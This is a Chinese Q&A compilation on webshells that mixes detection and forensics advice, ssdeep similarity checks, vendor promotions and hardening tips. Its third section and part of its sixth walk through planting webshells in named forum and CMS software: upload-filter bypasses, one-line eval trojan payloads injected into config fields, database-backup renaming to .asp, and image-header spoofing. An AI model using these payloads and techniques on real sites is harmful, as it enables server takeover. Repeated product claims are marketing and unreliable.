webshell检测方法三

‘壹’ webshell检测有什么方法思路

静态检测通过匹配特征码，特征值，危险函数函数来查找webshell的方法，只能查找已知的webshell，并且误报率漏报率会比较高，但是如果规则完善，可以减低误报率，但是漏报率必定会有所提高。优点是快速方便，对已知的webshell查找准确率高，部署方便，一个脚本就能搞定。缺点漏报率、误报率高，无法查找0day型webshell，而且容易被绕过。对于单站点的网站，用静态检测还是有很大好处，配合人工，能快速定位webshell，但是如果是一个成千上万站点的大型企业呢，这个时候再人肉那工作量可就大了。所以用这样一种思路：强弱特征。即把特征码分为强弱两种特征，强特征命中则必是webshell；弱特征由人工去判断。加入一种强特征，即把流行webshell用到的特征作为强特征重点监控，一旦出现这样的特征即可确认为webshell立即进行响应。要解决误报和漏报，就不能拘泥于代码级别了。可以换个角度考虑问题：文件系统。我们可以结合文件的属性来判断，比如apache是noboy启动的，webshell的属主必然也是nobody，如果我的Web目录无缘无故多了个nobody属主的文件，这里就有问题了。最理想的办法是需要制度和流程来建设一个web目录唯一发布入口，控制住这个入口，非法进来的Web文件自然可以发现。

‘贰’ 如何辨别webshell是否存在后门

1、检查系统密码文件
首先从明显的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。
awk –F: ‘length($2)==0 {print $1}’ /etc/shadow
2、查看一下进程，看看有没有奇怪的进程
重点查看进程：ps –aef | grep inetd
inetd是UNIX系统的守护进程，正常的inetd的pid都比较靠前，如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程，着重看inetd –s后面的内容。在正常情况下，LINUX系统中的inetd服务后面是没有-s参数的，当然也没有用inetd去启动某个文件；而solaris系统中也仅仅是inetd –s，同样没有用inetd去启动某个特定的文件；如果你使用ps命令看到inetd启动了某个文件，而你自己又没有用inetd启动这个文件，那就说明已经有人入侵了你的系统，并且以root权限起了一个简单的后门。
输入ps –aef 查看输出信息，尤其注意有没有以./xxx开头的进程。一旦发现异样的进程，经检查为入侵者留下的后门程序，立即运行kill –9 pid 开杀死该进程，然后再运行ps –aef查看该进程是否被杀死；一旦此类进程出现杀死以后又重新启动的现象，则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找：find / -name 程序名 –print，假设系统真的被入侵者放置了后门，根据找到的程序所在的目录，会找到很多有趣的东东，
接下来根据找到入侵者在服务器上的文件目录，一步一步进行追踪。
3、检查系统守护进程
检查/etc/inetd.conf文件，输入：cat /etc/inetd.conf | grep –v “^#”，输出的信息就是你这台机器所开启的远程服务。
一般入侵者可以通过直接替换in.xxx程序来创建一个后门，比如用/bin/sh 替换掉in.telnetd，然后重新启动inetd服务，那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。
4、检查网络连接和监听端口
输入netstat -an，列出本机所有的连接和监听的端口，查看有没有非法连接。
输入netstat –rn，查看本机的路由、网关设置是否正确。
输入 ifconfig –a，查看网卡设置。
5、检查系统日志
命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程，这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog，查看系统syslog进程的情况，判断syslog上次启动的时间是否正常，因为syslog是以root身份执行的，如果发现syslog被非法动过，那说明有重大的入侵事件。
在linux下输入ls –al /var/log
检查wtmp utmp，包括messgae等文件的完整性和修改时间是否正常，这也是手工擦除入侵痕迹的一种方法。
6、检查系统中的core文件
通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法，典型的RPC攻击就是通过这种方式。这种方式有一定的成功率，也就是说它并不能100%保证成功入侵系统，而且通常会在服务器相应目录下产生core文件，全局查找系统中的core文件，输入find / -name core –exec ls –l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为。
7、检查系统文件完整性
检查文件的完整性有多种方法，通常我们通过输入ls –l 文件名来查询和比较文件，这种方法虽然简单，但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询，查询的结果是否正常来判断文件是否完整。

‘叁’ 如何进入网站后台 获取webshell进入后台

一、直接上传获得webshell
这种对php和jsp的一些程序比较常见，MolyX BOARD就是其中一例，直接在心情图标管理上传.php类型，虽然没有提示，其实已经成功了，上传的文 件url应该是http://forums/images/smiles/下，前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名，bo-blog后台可以可以直接上传.php文件，上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统)，因过滤上传文件不严，导致用户可以直接上传webshell到网站任意可写目录中，从而拿到网站的管理员控制权限。
二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型，而大多数的系统是允许添加上传类型，bbsxp后台可以添加asa|asP类型，ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp，可以添加.aspasp的文件类型来上传获得webshell。php系统的后台，我们可以添加.php.g1f的上传类型，这是php的一个特性,最后的哪个只要不是已知的文件类型即可，php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是：在上传类型中增加asp ，注意，asp后面是有个空格的，然后在前台上传ASP马，当然也要在后面加个空格！
三、利用后台管理功能写入webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台修改配置文件，写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是：添加一个新的友情链接，在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符，http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。
四、利用后台管理向配置文件写webshell
利用"""":""//"等符号构造最小马写入程序的配置文件，joekoe论坛，某某同学录，沸腾展望新闻系统，COCOON Counter统计程序等等，还有很多php程序都可以，COCOON Counter统计程序举例，在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//"，还有一种方法就是写上cnhacker at 263 dot net"%><%eval request(chr(35))%><%'，这样就会形成前后对应，最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连，需要说明的是数据库插马时候要选前者。再如动易2005，到文章中心管理-顶部菜单设置-菜单其它特效，插入一句话马"%><%execute request("l")%><%'，保存顶部栏目菜单参数设置成功后，我们就得到马地址http://网站/admin/rootclass_menu_config.asp。
五、利用后台数据库备份及恢复获得webshell
主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码，导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件，从而可以查看并获得网页源代码，并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候，但是有asp系统在运行，利用此方法来查看源代码来获得其数据库的位置，为数据库插马来创造机会，动网论坛就有一个ip地址的数据库，在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法，很多asp程序在即使改了后缀名后也会提示文件非法，通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的，还有一种就是用记事本打开图片文件，随便粘贴一部分复制到asp木马文件头，修改gif后缀后上传也可以突破检测，然后备份为.asp文件，成功得到webshell。
六、利用数据库压缩功能
可以将数据的防下载失效从而使插入数据库的最小马成功运行，比较典型的就是loveyuki的L-BLOG，在友情添加的url出写上<%eval request (chr(35))%>, 提交后，在数据库操作中压缩数据库，可以成功压缩出.asp文件，用海洋的最小马的eval客户端连就得到一个webshell。
七、asp+mssql系统
这里需要提一点动网mssql版，但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片，然后记住其上传路径。写一个本地提交的表单

‘肆’ 如何最大化的去发现检测是否存在WebShell

主要有四点：

1） 合理利用市场优秀产品，“网页后门检查工具WebShell Scanner”——真正的WebShell发现神器！该工具需在Web服务器中扫描，让“一句话”无处遁形，即使对后门代码加密也有部分解密手段发现隐藏后门。

2） 勤用WebScan、DBScan、监测平台、远程安全评估等扫描工具，及时发现漏洞，根据报表建议，及时整改，让那些“活雷锋”见鬼去吧。

3） 部署网站卫士，看你如何上传WebShell。

4） 明御Web应用防火墙，将攻击挡在墙外，护Web永安全。

‘伍’ 有了解雷火·AI-Webshell检测系统的吗

雷火引擎是青藤云安全自研的Webshell检测引擎，不依赖正则匹配，而是通过把复杂的变形和混淆回归成等价最简形式，然后根据AI推理发现Webshell中存在的可疑内容，经过多轮公开的对抗测试，雷火引擎在强对抗环境下都能有效发现各式企图绕过一般检测引擎的 Webshell。

‘陆’ webshell有些什么权限

一方面，webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马，目前比较流行的asp或php木马，也有基于.NET的脚本木马。

Access数据库拿webshell：

首先看是否能找到网站漏洞进行网站的后台（sql注入等）或者通过扫描工具来看看是否网站有文件上传漏洞（在没拿到后台）。进入后台后，看看是否有数据库备份功能。

a) 如果有数据库备份功能，用一句话木马。通过各种方法，把这句话写入到数据库，再把写入这句话的数据库通过备份变为后缀名为.asp的文件。

当然要注意备份后的文件地址，然后进行访问，如果显示乱码，基本上成功了，然后通过一句话木马客户端进行连接，就连接出现乱码的那个页面，连接成功后，就可以看到webshell了。

b) 用图片上传功能。我们把asp木马的后缀改为图片的后缀名，如GIF，JPG，BMP之类的，进行上传，上传成功后，会提示上传成功，并且会给出文件位置；有时候可能不会提示，我们可以通过抓包工具进行抓包（如WSockExpert）。

抓到上传的路径；然后通过数据库备份的功能，把gif等图片的格式变为asp格式的数据库，进行访问，这时候我们通常就可以看到我们的WebShell了！但是目前目前有的网站会对这个进行检测，如果备份文件检查不出属于数据库。

则会提示“不合法的数据库”，既然要检测是否有数据库特征，那我们把图片加入数据库特征就可以了，我们可以通过DOS的COPY命令给图片加上数据库特征了，命令如下：COPY 木马图片.gif 数据库文件.mdb 合成后的文件.gif，这样，我们合成的图片就带有数据库的特征了！

‘柒’ 青藤雷火引擎Webshell检测工具好用吗

青藤雷火引擎在现有Webshell检测工具里面是检测率最高的，没有之一。青藤雷火引擎是青藤公司研发的，青藤是专业的安全服务商，服务了非常多的政府，金融，能源，科技类的头部客户。青藤雷火引擎的问世，让世界Webshell检测水平提升到一个新的高度；

‘捌’ 青­藤雷­火引擎Webshell检测工具怎么样

青­藤雷火引­擎太好了，Webshell 检测 率超过现在有的所有检 测工具，在强对抗 环境下检测率高达99.54%。
青 藤­雷火引 擎不依赖正则匹配，是通过把复杂的变形和混淆回归成等价最简形式，然后根据AI推理发现Webshell中存在的可疑内容。青 ­藤雷火引擎解决了Webshell恶 意程序检测难的问题呢..

‘玖’ 如何使用ssdeep检测webshell

一 、安装ssdeep
下载ssdeep并安装 。
二、识别webshell实例
接下来我们下载一个webshell，试一试如何使用ssdeep来识别webshell
以b374k.php为例
首先获得webshell b374k.php的ssdeep hash(fuzzy hashing)值，并存储到b37_hashs.txt文件中
ssdeep -b webshell/b374k.php >b37_hashs.txt
cat b37_hashs.txt
ssdeep,1.1--blocksize:hash:hash,filename384::44snx0Rig5x752EBUxpc5,"b374k.php"
然后使用这个值来获得相似度，相似度为100(当然啦，因为没有做任何修改)
ssdeep -bm b37_hashs.txt webshell/b374k.php
b374k.php matches b37_hashs.txt:b374k.php (100)
为了方便理解，我们拿ssdeep与md5做类比
md5 webshell/b374k.php
MD5 (webshell/b374k.php) =
我们知道对文件取md5值是用于验证文件的完整性的，因为它对任意的修改都能感受到(hash碰撞小概率事件除外)
而ssdeep则用于计算文件相似度，它是通过计算上下文相关的分段hash值(fuzzy hashing)来判断文件相似度的。
在识别webshell的场景中，我们可以先获取样本的ssdeep hash值，然后设置相似度范围，来识别同一系列的变形shell
想想一个小白黑客获得一个好用的webshell后，第一件事会干嘛?肯定是改变登录账号密码
cp webshell/b374k.php webshell/b374k.php.bak
vim webshell/b374k.php.bak

心思稍微重点的想绕过WAF的童鞋，说不定还会修改cookie中的关键字
例如批量替换cookie txtauth关键字

修改完毕后，分别用md5与ssdeep来看发生了什么
md5 webshell/b374k.php.bak
MD5 (webshell/b374k.php.bak) =
md5值发生了变化，说明webshell文本内容发生了变化
接着使用ssdeep来查看修改后的webshell的相似度
ssdeep -bm b37_hashs.txt webshell/*
b374k.php matches b37_hashs.txt:b374k.php (100) #原始webshellb374k.php.bak matches b37_hashs.txt:b374k.php (97)#修改了登录账号与作者标记b374k.php.bak2 matches b37_hashs.txt:b374k.php (88)#修改了登录账号、作者标记、cookie特征
最后，我们选择一个合适的相似度来判断是否为webshell(真实场景中，调参找到合适的阈值才是考验人的活...)
例如，只筛选相似度90以上的
ssdeep -t 90 -bm b37_hashs.txt webshell/*
b374k.php matches b37_hashs.txt:b374k.php (100)b374k.php.bak matches b37_hashs.txt:b374k.php (97)
三、扩展
除了使用ssdeep来查找相似的恶意软件(静态文本)，我们还可以逆向思维，根据相似度来判断混在正常进程中的恶意进程，依据是进程在运行时由于变量变化而发生的变动是轻微的，而代码被加壳后的的变化是相当显着的，例如UPX加壳会使相似度瞬降到0%。

‘拾’ 网站被入侵了传了webshell怎么办

如何防止网站被上传WebShell网页木马?

1 )网站服务器方面，开启系统自带的防火墙，增强管理员账户密码强度等，更改远程桌面端口，定期更新服务器补丁和杀毒软件。

2）定期的更新服务器系统漏洞（windows 2008 2012、linux centos系统），网站系统升级，尽量不适用第三方的API插件代码。

3）如果自己对程序代码不是太了解的话，建议找网站安全公司去修复网站的漏洞，以及代码的安全检测与木马后门清除，国内推荐SINE安全公司、绿盟安全公司、启明星辰等的网站安全公司，做深入的网站安全服务,来保障网站的安全稳定运行，防止网站被挂马之类的安全问题。

4）尽量不要把网站的后台用户的密码设置的太简单化,要符合10到18位的大小写字母+数字+符号组合。

5）网站后台管理的路径一定不能用默认的admin或guanli或manage 或文件名为admin.asp的路径去访问。

6）服务器的基础安全设置必须要详细的做好,端口的安全策略，注册表安全，底层系统的安全加固，否则服务器不安全,网站再安全也没用